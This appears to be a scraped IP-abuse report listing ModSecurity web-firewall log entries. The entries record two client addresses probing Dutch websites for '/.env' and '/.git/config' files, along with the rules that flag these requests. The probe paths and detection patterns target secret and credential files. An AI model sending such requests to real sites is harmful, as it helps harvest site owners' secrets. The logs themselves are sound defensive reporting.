26/Mar/2026:18:22:54.359978 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 2.57.122.173] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "worldcup.jordymarije.nl"] [uri "/.env"] [unique_id "acVrbrDsx1FA4JyHUUooUQAAAAA"]
26/Mar/2026:18:22:54.359978 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [fi
...
show less
|
Web App Attack
|
|
π³π±
195.178.110.190
|
|
26/Mar/2026:18:12:03.933408 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ...
show more
26/Mar/2026:18:12:03.933408 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.190] ModSecurity: Warning. String match within "/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/" at TX:header_name_accept-charset. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "1128"] [id "920450"] [msg "HTTP header is restricted by policy (/accept-charset/)"] [data "Restricted header detected: /accept-charset/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.5"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [tag "PCI/12.1"] [hostname "ins.vetspons.nl"] [uri "/.git/config"] [unique_id "acVo4xpqjG52QQNtNBG3FwAAAAI"]
26/Mar/2026:18:12:03.933408 +0100Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 195.178.110.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAM
...
show less
|
Web App Attack
|